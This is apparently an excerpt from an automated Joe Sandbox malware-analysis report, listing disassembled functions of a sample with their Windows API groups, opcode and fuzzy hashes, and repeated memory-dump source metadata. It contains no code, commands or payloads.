                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                    • API String ID: 2574300362-192647395
                                                                                                                    • Opcode ID: 9c402017b67deeecdf71e3c2df55c45970ec8440a50b34eba4d95c6c8b29e614
                                                                                                                    • Instruction ID: 05cedee9183864ae0ebd0892404bb9846d1445de958d87df56fd99a8e448cdeb
                                                                                                                    • Opcode Fuzzy Hash: 9c402017b67deeecdf71e3c2df55c45970ec8440a50b34eba4d95c6c8b29e614
                                                                                                                    • Instruction Fuzzy Hash: 59E01A66916B0282EF198B61E52436823E1FB18B48F880435D92D96350EFBED6ACC300
                                                                                                                    Function 00007FF65604B7E4 Relevance: 6.3, APIs: 4, Instructions: 299COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1cc42966959b643a311328828219b797476ac122a15b5d67e7ee0a83cfbaecc2
                                                                                                                    • Instruction ID: 184d9f2cb6ab19e90afad412e282a6c8da80d3ddc1d18c9f68a345504685019e
                                                                                                                    • Opcode Fuzzy Hash: 1cc42966959b643a311328828219b797476ac122a15b5d67e7ee0a83cfbaecc2
                                                                                                                    • Instruction Fuzzy Hash: 10D12876B04B5686EB24DF26C5902AC37B0FB98F89B154422DF8D97B58DF7AD848C340
                                                                                                                    Function 00007FF6560779D8 Relevance: 6.3, APIs: 4, Instructions: 282COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1473721057-0
                                                                                                                    • Opcode ID: f7e9a6a1c2f8c019007800361108cca29dc074ba0bb03e63b32f82c3ddf48b44
                                                                                                                    • Instruction ID: 81e9480eee476f5f699021464775fbc969d33b33f845d8f6a7fcc0fd04845c8d
                                                                                                                    • Opcode Fuzzy Hash: f7e9a6a1c2f8c019007800361108cca29dc074ba0bb03e63b32f82c3ddf48b44
                                                                                                                    • Instruction Fuzzy Hash: 6DD18C76B04B419AEB50EFA1D5801EC33B1FB44B88B440436DE4DA7BA9DF39E519C780
                                                                                                                    Function 00007FF65608D88C Relevance: 6.1, APIs: 4, Instructions: 134windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ClientMessageMoveRectScreenSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1249313431-0
                                                                                                                    • Opcode ID: 9c4d75fca34e601744925f37f1e480e3e4c466c4cf94c3035283d246947070fa
                                                                                                                    • Instruction ID: 923a04e14162217b87891988e563d3819a88614385162ab8a817a8097789a7e4
                                                                                                                    • Opcode Fuzzy Hash: 9c4d75fca34e601744925f37f1e480e3e4c466c4cf94c3035283d246947070fa
                                                                                                                    • Instruction Fuzzy Hash: C751D432A04A4289EB50CF25D9805BD3761FB44B98F594232DE6DA37D4CF3AE84AC700
                                                                                                                    Function 00007FF65605BAB8 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2267087916-0
                                                                                                                    • Opcode ID: 885fddea0d2d34b219ca6ab898c8b75d575591909594024e161a1fcc4b4d8134
                                                                                                                    • Instruction ID: fa7d688cd950daafd0e65eef2272f554e88f26283c0b502554579a0b114e4f88
                                                                                                                    • Opcode Fuzzy Hash: 885fddea0d2d34b219ca6ab898c8b75d575591909594024e161a1fcc4b4d8134
                                                                                                                    • Instruction Fuzzy Hash: 6251E422B05A1185FF50AF62CA905AC23B5FB55B98F584535DE0DA3B98DF3EE94AC300
                                                                                                                    Function 00007FF6560743C8 Relevance: 6.1, APIs: 4, Instructions: 126networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$socket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1881357543-0
                                                                                                                    • Opcode ID: 2f7cf8263c41ad3ca56e1a8fad4cf6ea685e9961862279cbfea50359dc3cc1a2
                                                                                                                    • Instruction ID: cbcdf8e280f432d22647616b4dbef4777ea920cecdac55d250ff977c7646f1d0
                                                                                                                    • Opcode Fuzzy Hash: 2f7cf8263c41ad3ca56e1a8fad4cf6ea685e9961862279cbfea50359dc3cc1a2
                                                                                                                    • Instruction Fuzzy Hash: D141C225B0868285EB50AF12E54467D7B90BF85FE8F084634DE1EABB96CF3DE405CB40
                                                                                                                    Function 00007FF656065DA4 Relevance: 6.1, APIs: 4, Instructions: 108fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3321077145-0
                                                                                                                    • Opcode ID: f222de675bb5cfeccc39e8564db9bf58fcd79be7e0b29fca596ca30ba57e565e
                                                                                                                    • Instruction ID: 072ff417069525834163afe675b68882cff3d586219516fd7bae957973cb5ef2
                                                                                                                    • Opcode Fuzzy Hash: f222de675bb5cfeccc39e8564db9bf58fcd79be7e0b29fca596ca30ba57e565e
                                                                                                                    • Instruction Fuzzy Hash: 3F41062AA04B8681EB14DF23D59446D7360FB88FD4B4C9432DF4E9BB66DE39E884C740
                                                                                                                    Function 00007FF65608F014 Relevance: 6.1, APIs: 4, Instructions: 107windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1352109105-0
                                                                                                                    • Opcode ID: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
                                                                                                                    • Instruction ID: da3fcb8fd176e53642fcab5193ff6f846086198fd4b0650d018f90e8d32fb612
                                                                                                                    • Opcode Fuzzy Hash: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
                                                                                                                    • Instruction Fuzzy Hash: 8D416172A08A4685EF51CF29D98457937A0FB84B94F594136CE5DE3361DF3EE449C700
                                                                                                                    Function 00007FF65601C72C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4141327611-0
                                                                                                                    • Opcode ID: a9867840faaecfdaa354c38ff02ada8b7424d64697801e09ff4ff5a4409c6d4e
                                                                                                                    • Instruction ID: 3a1d106ff6882018dbf9dd2b7e804f6f23acc7c9bdcfad01e54b4c5fc9ca2a79
                                                                                                                    • Opcode Fuzzy Hash: a9867840faaecfdaa354c38ff02ada8b7424d64697801e09ff4ff5a4409c6d4e
                                                                                                                    • Instruction Fuzzy Hash: FC41C532A0C74246FB619F51DA803796291EF80BB8F1C4131DA49A7AD5DFBED849C700
                                                                                                                    Function 00007FF65608C580 Relevance: 6.1, APIs: 4, Instructions: 95windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3340791633-0
                                                                                                                    • Opcode ID: 41522454ef5ffe58f3c47094a62836e99305b084494bc2ef8d406c22aeaeab5d
                                                                                                                    • Instruction ID: 5960ac118af2085f5f819ba6fb3dcaa9283e3cc559575ef2e1b45b5c94562de9
                                                                                                                    • Opcode Fuzzy Hash: 41522454ef5ffe58f3c47094a62836e99305b084494bc2ef8d406c22aeaeab5d
                                                                                                                    • Instruction Fuzzy Hash: 20419F31E0854686FB64CB25D6403B97771EB84BA4F5C5132DA0EA37E1CE3EE8A9C700
                                                                                                                    Function 00007FF65606D7DC Relevance: 6.1, APIs: 4, Instructions: 82networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$CloseConnectHandleOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1463438336-0
                                                                                                                    • Opcode ID: 9c6a6dce98b363ecdfbcced4837c14e9bd6a16cec9fa7559d6c8d26d8fbc25c1
                                                                                                                    • Instruction ID: d3ae20da70663378361df99cf01c19b3816cb3c886d65ef3b03ab3cd7b6f42d0
                                                                                                                    • Opcode Fuzzy Hash: 9c6a6dce98b363ecdfbcced4837c14e9bd6a16cec9fa7559d6c8d26d8fbc25c1
                                                                                                                    • Instruction Fuzzy Hash: 0531CF32A0875286EB24DB16E25477D6361FB89BD8F081135DE4D67B98DF7EE089CB00
                                                                                                                    Function 00007FF656023D98 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF65601A27B,?,?,?,00007FF65601A236), ref: 00007FF656023DB1
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF65601A27B,?,?,?,00007FF65601A236), ref: 00007FF656023E13
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF65601A27B,?,?,?,00007FF65601A236), ref: 00007FF656023E4D
                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF65601A27B,?,?,?,00007FF65601A236), ref: 00007FF656023E77
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1557788787-0
                                                                                                                    • Opcode ID: 01582a1cc1afdad6e1d5985337141992fa687edcd13d7850452916e3cfeba0bf
                                                                                                                    • Instruction ID: c715ebb1cb2c28fdfb3bde8e75261bfde442b0d0a37afa21bcede82d99467a2d
                                                                                                                    • Opcode Fuzzy Hash: 01582a1cc1afdad6e1d5985337141992fa687edcd13d7850452916e3cfeba0bf
                                                                                                                    • Instruction Fuzzy Hash: 44216F21B1879181EA249F16A940029B7A5FF98FD4B4C4135DE9EB3BE4DF3DE85AC700
                                                                                                                    Function 00007FF65608F8A8 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Long
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 847901565-0
                                                                                                                    • Opcode ID: 17af9f186f091bf577d3b0a8bd6a034cb4dd905415e59c2f23c9277c7aa4b264
                                                                                                                    • Instruction ID: 1cc788c37fb00cfb25f8e2641e53608e90d2c560411b74540a8613d6ea6b2cef
                                                                                                                    • Opcode Fuzzy Hash: 17af9f186f091bf577d3b0a8bd6a034cb4dd905415e59c2f23c9277c7aa4b264
                                                                                                                    • Instruction Fuzzy Hash: FE21D421A08B4185EA10CF269A8433A3761EF85BE4F5D4335DA6D977E5CF7DE409C300
                                                                                                                    Function 00007FF65609108C Relevance: 6.1, APIs: 4, Instructions: 71windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2864067406-0
                                                                                                                    • Opcode ID: b766ee5e7a6f79c275b6e8452a41ed66ab3f515ad85ef8642b06b7120701f994
                                                                                                                    • Instruction ID: 0fd0cb3e816c85d8dc93347c8365a34803e064c832bdefa68d787c17a9bc6477
                                                                                                                    • Opcode Fuzzy Hash: b766ee5e7a6f79c275b6e8452a41ed66ab3f515ad85ef8642b06b7120701f994
                                                                                                                    • Instruction Fuzzy Hash: 1D316F26A08A4681EB21CF16E5943BEB771FB84F98F584232DA4D93BA4CF3DD449C704
                                                                                                                    Function 00007FF6560550E4 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 69stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                                                    • String ID: cdecl
                                                                                                                    • API String ID: 4031866154-3896280584
                                                                                                                    • Opcode ID: deaeff6138769fdf6d873c851be99aeb1f41605d6981fa24cc03cadfce71aac2
                                                                                                                    • Instruction ID: 97dfd22db0e57b1efc4cd869bca9162bdf9aa303b40b52e9798f38a93bd2754d
                                                                                                                    • Opcode Fuzzy Hash: deaeff6138769fdf6d873c851be99aeb1f41605d6981fa24cc03cadfce71aac2
                                                                                                                    • Instruction Fuzzy Hash: 6B21E52170434285EA14AF12D6501787761EF58FD4F4C4234EB5E973A0EF3EE449C308
                                                                                                                    Function 00007FF65604D6A0 Relevance: 6.1, APIs: 4, Instructions: 67memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$InformationProcessToken$AllocCopyErrorFreeLastLength
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 837644225-0
                                                                                                                    • Opcode ID: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
                                                                                                                    • Instruction ID: f0c097c3bdfe66f3717483981ccbbd36122dcb146f5a1d7636b76cbed92051cf
                                                                                                                    • Opcode Fuzzy Hash: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
                                                                                                                    • Instruction Fuzzy Hash: B6210632A18B4186EB25CF21E50476C73A5FB84B96F49413ACE4D93784EF7EE84AC700
                                                                                                                    Function 00007FF655FE932C Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
